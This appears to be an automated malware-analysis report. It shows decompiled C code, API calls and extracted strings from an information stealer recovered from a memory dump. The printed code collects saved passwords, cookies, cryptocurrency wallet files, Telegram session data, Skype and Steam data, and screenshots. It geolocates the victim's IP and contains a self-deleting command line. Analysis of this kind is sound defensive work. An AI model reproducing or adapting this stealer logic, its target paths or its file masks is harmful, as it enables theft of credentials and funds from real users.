									E00407854(_v640, _t962, 0,  &_v636, _t1157, __eflags);
									_v280 = E00403D98(_v636);
									__eflags = 0;
									_v276 = 0;
									_t715 =  *0x41b150; // 0x41c764
									 *((intOrPtr*)( *_t715))( &_v304, E0041A02C, _v624, _v620);
									ExitProcess(0);
								}
							}
							goto L71;
						}
						E004038DC(_v8, 0x419fb0);
						if(_t1205 != 0) {
							goto L68;
						}
						E00407E90(_t962, _t979, _t1153, _t1157, _t1205);
						goto L71;
					} else {
						_t979 =  &_v56;
						E00407A18(0x419988,  &_v56, _v76, _t1194);
						_t1153 = E00404648(_v56) - 1;
						if(_t1153 < 0) {
							goto L65;
						}
						_t1155 = _t1153 + 1;
						_t963 = 0;
						do {
							_push(0);
							E00404804();
							_t1161 = _t1161 + 4;
							_t979 =  &_v60;
							E00407A18(0x419db4,  &_v60,  *((intOrPtr*)(_v56 + _t963 * 4)), 0);
							_t1197 = E00404648(_v60) - 4;
							if(_t1197 != 0) {
								goto L64;
							}
							E004038DC( *_v60, 0x419f80);
							if(_t1197 != 0) {
								goto L64;
							}
							_t979 =  &_v64;
							E00407A18(0x419f8c,  &_v64,  *((intOrPtr*)(_v60 + 0xc)), _t1197);
							_v87 = 0;
							_t1157 = E00404648(_v64) - 1;
							if(_t1157 < 0) {
								L62:
								_t1203 = _v87 - 1;
								if(_v87 == 1) {
									E004038DC( *((intOrPtr*)(_v60 + 8)), 0x419f98);
									E0041841C( *((intOrPtr*)(_v60 + 4)), _t963, 0x419f00 | _t1203 == 0x00000000, _t1155, _t1157);
								}
								goto L64;
							}
							_t1157 = _t1157 + 1;
							_v72 = 0;
							while(1) {
								E0040633C( *((intOrPtr*)(_v64 + _v72 * 4)), _t963,  &_v604, _t1155, _t1157);
								_t1088 =  *0x41b154; // 0x41c66c
								_v87 = E00403AD4(_v604,  *_t1088) != 0;
								if(_v87 == 1) {
									goto L62;
								}
								_v72 = _v72 + 1;
								_t1157 = _t1157 - 1;
								if(_t1157 != 0) {
									continue;
								}
								goto L62;
							}
							goto L62;
							L64:
							_t963 = _t963 + 1;
							_t1155 = _t1155 - 1;
							_t1205 = _t1155;
						} while (_t1205 != 0);
						goto L65;
					}
				} else {
					_t1156 = _t1153 + 1;
					_t964 = 0;
					do {
						if(E00403790( *((intOrPtr*)(_v48 + _t964 * 4))) < 5) {
							goto L50;
						}
						if(_t964 != 0) {
							L34:
							_t757 = _v48;
							_t1186 =  *((char*)( *((intOrPtr*)(_t757 + _t964 * 4)))) - 0x46;
							if( *((char*)( *((intOrPtr*)(_t757 + _t964 * 4)))) != 0x46) {
								L44:
								if( *((char*)( *((intOrPtr*)(_v48 + _t964 * 4)))) == 0x4c) {
									_push(_v76);
									_push( *((intOrPtr*)(_v48 + _t964 * 4)));
									_push(0x419988);
									_t1035 = 3;
									E00403850();
								}
								_t1191 =  *((char*)( *((intOrPtr*)(_v48 + _t964 * 4)))) - 0x49;
								if(_t1191 == 0) {
									_t977 =  &_v52;
									E00407A18(0x419db4,  &_v52,  *((intOrPtr*)(_v48 + _t964 * 4)), _t1191);
									E004038DC( *((intOrPtr*)(_v52 + 4)), 0x419e20);
									if(_t1191 != 0) {
										_t1035 = "ip.txt";
										E0040E6D4( *((intOrPtr*)(_v52 + 4)), _t964, "ip.txt", _t1156, _t1157);
									} else {
										_v85 = 1;
										E00417D84("http://ip-api.com/json", _t964, 0, _t1156, _t1157,  &_v32);
										E004074E8("\"query\":\"", _t964, 0x419e58, _v32, _t1157,  &_v80);
										_t977 = 0x419e58;
										E004074E8("\"countryCode\":\"", _t964, 0x419e58, _v32, _t1157,  &_v84);
										_push(_v80);
										_push(0x419e90);
										_push(_v84);
										E00403850();
										_t1035 = "ip.txt";
										E0040E6D4(_v452, _t964, "ip.txt", _t1156, _t1157);
									}
								}
								goto L50;
							}
							E00407A18(0x419db4,  &_v52,  *((intOrPtr*)(_v48 + _t964 * 4)), _t1186);
							E0040357C( &_v96,  *((intOrPtr*)(_v52 + 8)));
							if(E00403AD4(0x419dc0, _v96) != 1) {
								E00403D88( &_v424,  *((intOrPtr*)(_v52 + 0x1c)));
								_push(_v424);
								E00403D88( &_v428,  *((intOrPtr*)(_v52 + 0x10)));
								_push(E00407108(_v428, _t964,  &_v52, __eflags));
								_push(E004038DC( *((intOrPtr*)(_v52 + 0x14)), 0x419e04) & 0xffffff00 | __eflags == 0x00000000);
								_t807 = E004038DC( *((intOrPtr*)(_v52 + 0x18)), 0x419e04);
								_t192 = __eflags == 0;
								__eflags = _t192;
								_push(_t807 & 0xffffff00 | _t192);
								_push(1);
								_push("Files\\");
								_push( *((intOrPtr*)(_v52 + 4)));
								_push(0x419de8);
								E00403850();
								E00403D88( &_v432, _v436);
								_push(_v432);
								E00403D88( &_v440,  *((intOrPtr*)(_v52 + 0xc)));
								_push(_v440);
								E004037DC( &_v448, 0x419de8,  *((intOrPtr*)(_v52 + 8)));
								E00403D88( &_v444, _v448);
								_pop(_t1035);
								_pop(_t977);
								E00413F58(_v444, _t964, _t977, _t1035, _t1156, _t1157);
								goto L44;
							}
							_t977 = 0x419dd0;
							_t1035 = _v96;
							E004074E8(0x419dc0, _t964, 0x419dd0, _v96, _t1157,  &_v108);
							_push( &_v241);
							_push(0x81);
							_t828 =  *0x41b240; // 0x41c6f8
							if( *((intOrPtr*)( *_t828))() == 0) {
								goto L71;
							}
							_t1157 =  &_v241;
							while( *_t1157 != 0) {
								_t831 =  *0x41b114; // 0x41c6fc
								E0040709C( *((intOrPtr*)( *_t831))(_t1157), _t964,  &_v356, _t1157, __eflags);
								E0040377C( &_v352, _v356);
								_t1035 = _v108;
								_t838 = E00403AD4(_v352, _v108);
								__eflags = _t838;
								if(_t838 != 0) {
									_push( &_v360);
									E00403CF4( &_v364, _t1157);
									_push(_v364);
									_push("%DSK_");
									_push(_v108);
									E00403850();
									E00403D88( &_v368, _v372);
									_push(_v368);
									E00403D88( &_v376, _v96);
									_pop(_t1125);
									_t989 = 0x419ddc;
									E0040717C(_v376, _t964, _t989, _t1125);
									E0040377C( &_v104, _v360);
									E004034E4( &_v100);
									_push( *((intOrPtr*)(_v52 + 4)));
									_push(0x419de8);
									_push(_v104);
									E00403850();
									E00403D88( &_v384, _v100);
									E0040717C(_v384, _t964, 0, 0x419df0,  &_v380);
									E00403DB4( &_v380, 0, 0x419df8, __eflags);
									E0040377C( &_v100, _v380);
									E00403D88( &_v392, _v100);
									E004078D8(_v392, _t964,  &_v388, __eflags);
									E0040377C( &_v100, _v388);
									E00403D88( &_v396,  *((intOrPtr*)(_v52 + 0x1c)));
									_push(_v396);
									E00403D88( &_v400,  *((intOrPtr*)(_v52 + 0x10)));
									_push(E00407108(_v400, _t964, 0, __eflags));
									_push(E004038DC( *((intOrPtr*)(_v52 + 0x14)), 0x419e04) & 0xffffff00 | __eflags == 0x00000000);
									_t885 = E004038DC( *((intOrPtr*)(_v52 + 0x18)), 0x419e04);
									_t162 = __eflags == 0;
									__eflags = _t162;
									_push(_t885 & 0xffffff00 | _t162);
									_push(1);
									E004037DC( &_v408, _v100, "Files\\");
									E00403D88( &_v404, _v408);
									_push(_v404);
									E00403D88( &_v412,  *((intOrPtr*)(_v52 + 0xc)));
									_push(_v412);
									E004037DC( &_v420, 0x419de8, _v104);
									E00403D88( &_v416, _v420);
									_pop(_t1035);
									_pop(_t977);
									E00413F58(_v416, _t964, _t977, _t1035, _t1156, _t1157);
								}
								_t1157 = _t1157 + 4;
								__eflags = _t1157;
							}
							goto L44;
						} else {
							_t902 =  *((intOrPtr*)(_v48 + _t964 * 4));
							_t1169 =  *((char*)(_t902 + 1)) - 0x2b;
							if( *((char*)(_t902 + 1)) == 0x2b) {
								E0040E1DC(_t964, _t1035, _t1156, _t1157, _t1169, _t1207);
								E00405424( &_v344);
								_t1035 = "PasswordsList.txt";
								E0040E6D4(_v344, _t964, "PasswordsList.txt", _t1156, _t1157);
							}
							if( *((char*)( *((intOrPtr*)(_v48 + _t964 * 4)) + 2)) == 0x2b) {
								E00413BB4();
								E00405574( &_v348);
								_t1118 =  *0x41b2fc; // 0x41ca18
								_t1035 =  *_t1118;
								E0040E6D4(_v348, _t964,  *_t1118, _t1156, _t1157);
							}
							if( *((char*)( *((intOrPtr*)(_v48 + _t964 * 4)) + 9)) == 0x2b) {
								E00413BE8();
							}
							if( *((char*)( *((intOrPtr*)(_v48 + _t964 * 4)) + 3)) == 0x2b) {
								E00414DE8(L"Coins", _t964, _t1156, _t1157);
								_t934 = E00413F58(L"%appdata%\\Electrum\\wallets\\", _t964, L"Coins\\Electrum", 0x4199fc, _t1156, _t1157, 0, 0, 1, 0x7d0, 0);
								_t1111 =  *0x41b2c4; // 0x41b0b0
								 *_t1111 =  *_t1111 + _t934;
								_t936 = E00413F58(L"%appdata%\\Electrum-LTC\\wallets\\", _t964, L"Coins\\Electrum-LTC", 0x4199fc, _t1156, _t1157, 0, 0, 1, 0x7d0, 0);
								_t1113 =  *0x41b2c4; // 0x41b0b0
								 *_t1113 =  *_t1113 + _t936;
								_t938 = E00413F58(L"%APPDATA%\\Ethereum\\keystore\\", _t964, L"Coins\\Ethereum", L"UTC*", _t1156, _t1157, 0, 0, 1, 0x1388, 0);
								_t1115 =  *0x41b2c4; // 0x41b0b0
								 *_t1115 =  *_t1115 + _t938;
								if(E00413F58(L"%APPDATA%\\Exodus\\", _t964, L"Coins\\Exodus", L"*.json,*.seco", _t1156, _t1157, 0, 0, 1, 0x1388, 0) > 0) {
									_t950 =  *0x41b2c4; // 0x41b0b0
									 *_t950 =  *_t950 + 1;
								}
								if(E00413F58(L"%APPDATA%\\Jaxx\\Local Storage\\", _t964, L"Coins\\Jaxx\\Local Storage\\", 0x4199fc, _t1156, _t1157, 0, 0, 1, 0x1388, 0) > 0) {
									_t949 =  *0x41b2c4; // 0x41b0b0
									 *_t949 =  *_t949 + 1;
								}
								_t977 = L"Coins\\MultiBitHD";
								_t1035 = L"mbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml";
								if(E00413F58(L"%APPDATA%\\MultiBitHD\\", _t964, L"Coins\\MultiBitHD", L"mbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml", _t1156, _t1157, 0, 0, 1, 0x1388, 0) > 0) {
									_t948 =  *0x41b2c4; // 0x41b0b0
									 *_t948 =  *_t948 + 1;
								}
								_t945 =  *0x41b2c4; // 0x41b0b0
								_t1179 =  *_t945;
								if( *_t945 > 0) {
									E00405114(0x419cd8, _t964, _t1156, _t1157, _t1179);
								}
							}
							if( *((char*)( *((intOrPtr*)(_v48 + _t964 * 4)) + 4)) == 0x2b) {
								E00414808(L"Skype", _t964, _t1156, _t1157);
							}
							if( *((char*)( *((intOrPtr*)(_v48 + _t964 * 4)) + 5)) == 0x2b) {
								_t977 = L"Telegram";
								_t1035 = L"D877F783D5*,map*";
								E00413F58(L"%appdata%\\Telegram Desktop\\tdata\\", _t964, L"Telegram", L"D877F783D5*,map*", _t1156, _t1157, 0, 0, 1, 0x3e8, 0);
							}
							if( *((char*)( *((intOrPtr*)(_v48 + _t964 * 4)) + 6)) == 0x2b) {
								E00414A90(L"Steam", _t964, _t1156, _t1157);
							}
							if( *((char*)( *((intOrPtr*)(_v48 + _t964 * 4)) + 7)) == 0x2b) {
								_push(0);
								_push(0x32);
								_push(L"image/jpeg");
								_push( &_v68);
								_push(GetSystemMetrics(1));
								_t921 = GetSystemMetrics(0);
								_t977 = 0;
								_pop(_t1109);
								E00416FB0(_t921, _t964, 0, _t1109, _t1156, _t1157);
								_t1035 = "scr.jpg";
								E0040E6D4(_v68, _t964, "scr.jpg", _t1156, _t1157);
							}
							if( *((char*)( *((intOrPtr*)(_v48 + _t964 * 4)) + 8)) == 0x2b) {
								_v86 = 1;
							}
							goto L34;
						}
						L50:
						_t964 = _t964 + 1;
						_t1156 = _t1156 - 1;
						_t1192 = _t1156;
					} while (_t1156 != 0);
					goto L51;
				}
			}

0x004186c4
0x004186c4
0x004186c4
0x004186c4
0x004186c5
0x004186c7
0x004186cc
0x004186cc
0x004186ce
0x004186d0
0x004186d0
0x004186d0
0x004186d3
0x004186d4
0x004186d5
0x004186d6
0x004186dc
0x004186e3
0x004186e4
0x004186e9
0x004186ec
0x004186f2
0x004186f7
0x004186fb
0x00418707
0x0041870c
0x00418717
0x00418722
0x00418729
0x00418734
0x00418735
0x00418751
0x00418753
0x00418756
0x00418764
0x0041965c
0x0041965e
0x00419661
0x00419664
0x0041966f
0x0041967f
0x0041968a
0x0041969a
0x004196aa
0x004196b5
0x004196c5
0x004196d0
0x004196e0
0x004196eb
0x004196fb
0x00419706
0x00419716
0x00419721
0x00419731
0x0041973c
0x0041974c
0x00419757
0x00419767
0x00419772
0x00419782
0x00419792
0x0041979d
0x004197ad
0x004197b8
0x004197c8
0x004197d3
0x004197e3
0x004197ee
0x004197fe
0x0041980e
0x00419816
0x0041981e
0x00419829
0x00419836
0x0041983e
0x0041984b
0x0041985d
0x0041985d
0x00418772
0x00418784
0x00418792
0x004187a0
0x004187ab
0x004187bc
0x004187cf
0x004187df
0x004187f0
0x00418800
0x0041880d
0x00418812
0x00000000
0x00000000
0x00418820
0x00418825
0x00000000
0x00000000
0x0041883f
0x0041884d
0x00418866
0x00418874
0x00418884
0x00418890
0x0041889d
0x004188a8
0x004188ae
0x004188b9
0x004188c1
0x004188c8
0x004188d7
0x004188da
0x00418fb5
0x00418fb5
0x00418fb5
0x00418fb8
0x00418fc3
0x00418fc8
0x00418fd9
0x00418fe9
0x00418ff4
0x00419005
0x0041900a
0x00419010
0x0041901b
0x0041902c
0x00419031
0x00419037
0x00419042
0x00419053
0x00419064
0x00419069
0x0041906f
0x0041907a
0x0041908b
0x0041909c
0x004190a1
0x004190a7
0x004190b2
0x004190c3
0x004190d4
0x004190d9
0x004190df
0x004190ea
0x004190fb
0x0041910c
0x00419111
0x00419117
0x00419122
0x00419129
0x0041913a
0x0041914b
0x00419150
0x00419156
0x00419161
0x00419168
0x00419179
0x0041918a
0x0041918f
0x00419195
0x004191a0
0x004191a7
0x004191b8
0x004191c9
0x004191ce
0x004191d4
0x004191df
0x004191e6
0x004191f7
0x00419208
0x0041920d
0x00419213
0x00419221
0x00419226
0x0041922c
0x00419237
0x00419248
0x0041924d
0x0041925b
0x00419260
0x00419265
0x0041926a
0x0041926c
0x00419271
0x00419274
0x00419279
0x0041927e
0x00419280
0x00419285
0x0041928a
0x0041928f
0x00419294
0x00419296
0x004192a1
0x004192a6
0x004192ac
0x004192b1
0x004192b6
0x004192b8
0x004192bd
0x004192c2
0x004192c7
0x004192cc
0x004192ce
0x004192d9
0x004192de
0x004192e4
0x004192e9
0x004192ee
0x004192f0
0x004192f5
0x004192fa
0x004192ff
0x00419304
0x00419306
0x00419311
0x00419316
0x0041931c
0x00419321
0x00419326
0x00419328
0x0041932d
0x0041933a
0x0041933f
0x00419343
0x00419345
0x00419348
0x0041934d
0x00419352
0x00419354
0x00419359
0x0041935c
0x00419361
0x00419364
0x00419369
0x0041936e
0x00419370
0x00419375
0x00419382
0x00419382
0x00419392
0x0041939e
0x004193a6
0x004193af
0x004193b6
0x004193bd
0x004193c5
0x004193ca
0x004193cd
0x004194dd
0x004194dd
0x004194e8
0x004194f8
0x004194fd
0x00419518
0x00419520
0x00419525
0x0041952b
0x0041952f
0x00419542
0x00419547
0x00419551
0x0041955d
0x00419565
0x00419576
0x00419586
0x00419597
0x004195aa
0x004195bb
0x004195cc
0x004195e7
0x004195f7
0x00419605
0x00419616
0x00419627
0x00419637
0x0041963d
0x0041963f
0x0041964c
0x00419653
0x00419657
0x00419657
0x0041952f
0x00000000
0x00419525
0x00419507
0x0041950c
0x00000000
0x00000000
0x0041950e
0x00000000
0x004193d3
0x004193d3
0x004193de
0x004193ed
0x004193f0
0x00000000
0x00000000
0x004193f6
0x004193f7
0x004193f9
0x004193f9
0x00419409
0x0041940e
0x00419411
0x0041941f
0x0041942c
0x0041942f
0x00000000
0x00000000
0x0041943f
0x00419444
0x00000000
0x00000000
0x0041944a
0x00419458
0x0041945d
0x0041946b
0x0041946e
0x004194b1
0x004194b1
0x004194b5
0x004194c2
0x004194d0
0x004194d0
0x00000000
0x004194b5
0x00419470
0x00419471
0x00419478
0x00419487
0x00419492
0x004194a1
0x004194a9
0x00000000
0x00000000
0x004194ab
0x004194ae
0x004194af
0x00000000
0x00000000
0x00000000
0x004194af
0x00000000
0x004194d5
0x004194d5
0x004194d6
0x004194d6
0x004194d6
0x00000000
0x004193f9
0x004188e0
0x004188e0
0x004188e1
0x004188e3
0x004188f1
0x00000000
0x00000000
0x004188f9
0x00418b3e
0x00418b3e
0x00418b44
0x00418b47
0x00418ed1
0x00418eda
0x00418edc
0x00418ee2
0x00418ee5
0x00418eed
0x00418ef2
0x00418ef2
0x00418efd
0x00418f00
0x00418f06
0x00418f14
0x00418f24
0x00418f29
0x00418fa3
0x00418fa8
0x00418f2b
0x00418f2b
0x00418f3f
0x00418f55
0x00418f5e
0x00418f6b
0x00418f70
0x00418f73
0x00418f78
0x00418f86
0x00418f91
0x00418f96
0x00418f96
0x00418f29
0x00000000
0x00418f00
0x00418b5b
0x00418b69
0x00418b7c
0x00418dfa
0x00418e05
0x00418e12
0x00418e22
0x00418e36
0x00418e42
0x00418e47
0x00418e47
0x00418e4a
0x00418e4b
0x00418e4d
0x00418e55
0x00418e58
0x00418e68
0x00418e79
0x00418e84
0x00418e91
0x00418e9c
0x00418eae
0x00418ebf
0x00418eca
0x00418ecb
0x00418ecc
0x00000000
0x00418ecc
0x00418b86
0x00418b8b
0x00418b93
0x00418b9e
0x00418b9f
0x00418ba4
0x00418baf
0x00000000
0x00000000
0x00418bb5
0x00418de0
0x00418bc1
0x00418bd0
0x00418be1
0x00418bec
0x00418bef
0x00418bf4
0x00418bf6
0x00418c02
0x00418c0b
0x00418c16
0x00418c17
0x00418c1c
0x00418c2f
0x00418c40
0x00418c4b
0x00418c55
0x00418c60
0x00418c61
0x00418c62
0x00418c70
0x00418c78
0x00418c80
0x00418c83
0x00418c88
0x00418c93
0x00418ca8
0x00418cba
0x00418cca
0x00418cd8
0x00418ce6
0x00418cf7
0x00418d05
0x00418d16
0x00418d21
0x00418d2e
0x00418d3e
0x00418d52
0x00418d5e
0x00418d63
0x00418d63
0x00418d66
0x00418d67
0x00418d77
0x00418d88
0x00418d93
0x00418da0
0x00418dab
0x00418dba
0x00418dcb
0x00418dd6
0x00418dd7
0x00418dd8
0x00418dd8
0x00418ddd
0x00418ddd
0x00418ddd
0x00000000
0x004188ff
0x00418902
0x00418905
0x00418909
0x0041890b
0x00418916
0x00418921
0x00418926
0x00418926
0x00418935
0x00418937
0x00418942
0x0041894d
0x00418953
0x00418955
0x00418955
0x00418964
0x00418966
0x00418966
0x00418975
0x00418980
0x004189a1
0x004189a6
0x004189ac
0x004189ca
0x004189cf
0x004189d5
0x004189f3
0x004189f8
0x004189fe
0x00418a23
0x00418a25
0x00418a2a
0x00418a2a
0x00418a4f
0x00418a51
0x00418a56
0x00418a56
0x00418a65
0x00418a6a
0x00418a7b
0x00418a7d
0x00418a82
0x00418a82
0x00418a84
0x00418a89
0x00418a8c
0x00418a93
0x00418a93
0x00418a8c
0x00418aa2
0x00418aa9
0x00418aa9
0x00418ab8
0x00418ac7
0x00418acc
0x00418ad6
0x00418ad6
0x00418ae5
0x00418aec
0x00418aec
0x00418afb
0x00418afd
0x00418aff
0x00418b01
0x00418b09
0x00418b11
0x00418b14
0x00418b19
0x00418b1b
0x00418b1c
0x00418b21
0x00418b29
0x00418b29
0x00418b38
0x00418b3a
0x00418b3a
0x00000000
0x00418b38
0x00418fad
0x00418fad
0x00418fae
0x00418fae
0x00418fae
0x00000000
0x004188e3

APIs

CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00418751

Part of subcall function 00409668: CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6,?,?), ref: 004096BF
Part of subcall function 00409668: CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6), ref: 0040970D
Part of subcall function 00409668: LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6,?,?,?), ref: 00409762
Part of subcall function 00409668: GetProcAddress.KERNEL32(00000000,00000000), ref: 00409782
Part of subcall function 00409668: GetProcAddress.KERNEL32(00000000,00000000), ref: 0040979C

GetSystemMetrics.USER32 ref: 00418B0C
GetSystemMetrics.USER32 ref: 00418B14
ExitProcess.KERNEL32(00000000), ref: 00419657

Strings

exit, xrefs: 0041881B
<info, xrefs: 00419260
D877F783D5*,map*, xrefs: 00418ACC
Coins\Electrum, xrefs: 00418992
</info, xrefs: 00419274
Steam, xrefs: 00418AE7
<, xrefs: 00419547
mbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml, xrefs: 00418A6A
/c %WINDIR%\system32\timeout.exe 3 & del ", xrefs: 00419592
%APPDATA%\Ethereum\keystore\, xrefs: 004189EE
%appdata%\Telegram Desktop\tdata\, xrefs: 00418AD1
Coins\MultiBitHD, xrefs: 00418A65
Coins\Electrum-LTC, xrefs: 004189BB
</coks, xrefs: 004192E4
*.json,*.seco, xrefs: 00418A12
++++, xrefs: 00418FB5
<c>, xrefs: 0041883A
Coins\Ethereum, xrefs: 004189E4
scr.jpg, xrefs: 00418B21
<d>, xrefs: 00418898
%APPDATA%\MultiBitHD\, xrefs: 00418A6F
<pwds, xrefs: 0041928A
UTC*, xrefs: 004189E9
%comspec%, xrefs: 00419571
</file, xrefs: 0041931C
<coks, xrefs: 004192C2
http://ip-api.com/json, xrefs: 00418F3A
System.txt, xrefs: 00418FE4
</pwds, xrefs: 004192AC
Coins\Exodus, xrefs: 00418A0D
Files\, xrefs: 00418D72, 00418E4D
Coins\Jaxx\Local Storage\, xrefs: 00418A39
Skype, xrefs: 00418AA4
</ip, xrefs: 00419364
PasswordsList.txt, xrefs: 00418921
%appdata%\Electrum\wallets\, xrefs: 0041899C
%APPDATA%\Jaxx\Local Storage\, xrefs: 00418A43
<n>, xrefs: 00418861
"countryCode":", xrefs: 00418F66
T_@, xrefs: 00419403, 0041981E
<file, xrefs: 004192FA
%appdata%\Electrum-LTC\wallets\, xrefs: 004189C5
image/jpeg, xrefs: 00418B01
Coins, xrefs: 0041897B
<ip, xrefs: 00419348
GET, xrefs: 00418F33
%DSK_, xrefs: 00418B71, 00418B8E, 00418C17
ip.txt, xrefs: 00418F91, 00418FA3
%APPDATA%\Exodus\, xrefs: 00418A17
</c>, xrefs: 00418832
Telegram, xrefs: 00418AC7
</d>, xrefs: 00418890
"query":", xrefs: 00418F50
</n>, xrefs: 00418859

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Create$AddressDirectoryMetricsProcSystem$ExitLibraryLoadMutexProcess
String ID: "countryCode":"$"query":"$%APPDATA%\Ethereum\keystore\$%APPDATA%\Exodus\$%APPDATA%\Jaxx\Local Storage\$%APPDATA%\MultiBitHD\$%DSK_$%appdata%\Electrum-LTC\wallets\$%appdata%\Electrum\wallets\$%appdata%\Telegram Desktop\tdata\$%comspec%$*.json,*.seco$++++$/c %WINDIR%\system32\timeout.exe 3 & del "$<$</c>$</coks$</d>$</file$</info$</ip$</n>$</pwds$<c>$<coks$<d>$<file$<info$<ip$<n>$<pwds$Coins$Coins\Electrum$Coins\Electrum-LTC$Coins\Ethereum$Coins\Exodus$Coins\Jaxx\Local Storage\$Coins\MultiBitHD$D877F783D5*,map*$Files\$GET$PasswordsList.txt$Skype$Steam$System.txt$T_@$Telegram$UTC*$exit$http://ip-api.com/json$image/jpeg$ip.txt$mbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml$scr.jpg
API String ID: 2865495769-3281574059
Opcode ID: 77f75a62fe1b84184f4f5c61f86cd6f58c01be65bc5fe33c88b26c41f659bb80
Instruction ID: 12fbeab09d86b4d4d3426c2dede24d6d64c59345960e79b613594a42cd3754e1
Opcode Fuzzy Hash: 77f75a62fe1b84184f4f5c61f86cd6f58c01be65bc5fe33c88b26c41f659bb80
Instruction Fuzzy Hash: 91A21A34A002199BDB10EB55DC91BDEB7B5EF49304F5080BBF408BB291DB78AE858F59

Uniqueness

Uniqueness Score: -1.00%

Function 00417216, Relevance: 57.8, APIs: 20, Strings: 13, Instructions: 64
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417216() {
				void* _t1;
				struct HINSTANCE__* _t2;
				struct HINSTANCE__* _t4;
				_Unknown_base(*)()* _t21;

				 *0x41cb2c =  *0x41cb2c - 1;
				if( *0x41cb2c < 0) {
					_t2 = LoadLibraryA("crtdll.dll"); // executed
					 *0x41cb04 = GetProcAddress(_t2, "wcscmp");
					_t4 = LoadLibraryA("Gdiplus.dll"); // executed
					 *0x41cb08 = GetProcAddress(_t4, "GdiplusStartup");
					 *0x41cb0c = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdiplusShutdown");
					 *0x41cb10 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipCreateBitmapFromHBITMAP");
					 *0x41cb14 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipGetImageEncodersSize");
					 *0x41cb18 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipGetImageEncoders");
					 *0x41cb1c = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipDisposeImage");
					 *0x41cb20 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipSaveImageToStream");
					 *0x41cb24 = GetProcAddress(LoadLibraryA("ole32.dll"), "CreateStreamOnHGlobal");
					_t21 = GetProcAddress(LoadLibraryA("ole32.dll"), "GetHGlobalFromStream");
					 *0x41cb28 = _t21;
					return _t21;
				}
				return _t1;
			}

0x00417218
0x0041721f
0x0041722f
0x0041723a
0x00417249
0x00417254
0x0041726e
0x00417288
0x004172a2
0x004172bc
0x004172d6
0x004172f0
0x0041730a
0x0041731f
0x00417324
0x00000000
0x00417324
0x00417329

APIs

LoadLibraryA.KERNEL32(crtdll.dll,wcscmp), ref: 0041722F
GetProcAddress.KERNEL32(00000000,crtdll.dll), ref: 00417235
LoadLibraryA.KERNEL32(Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417249
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 0041724F
LoadLibraryA.KERNEL32(Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417263
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417269
LoadLibraryA.KERNEL32(Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 0041727D
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417283
LoadLibraryA.KERNEL32(Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417297
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 0041729D
LoadLibraryA.KERNEL32(Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll), ref: 004172B1
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 004172B7
LoadLibraryA.KERNEL32(Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll), ref: 004172CB
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 004172D1
LoadLibraryA.KERNEL32(Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll), ref: 004172E5
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 004172EB
LoadLibraryA.KERNEL32(ole32.dll,CreateStreamOnHGlobal,00000000,Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll), ref: 004172FF
GetProcAddress.KERNEL32(00000000,ole32.dll), ref: 00417305
LoadLibraryA.KERNEL32(ole32.dll,GetHGlobalFromStream,00000000,ole32.dll,CreateStreamOnHGlobal,00000000,Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll), ref: 00417319
GetProcAddress.KERNEL32(00000000,ole32.dll), ref: 0041731F

Strings

GdipDisposeImage, xrefs: 004172C1
CreateStreamOnHGlobal, xrefs: 004172F5
GdipGetImageEncoders, xrefs: 004172A7
GetHGlobalFromStream, xrefs: 0041730F
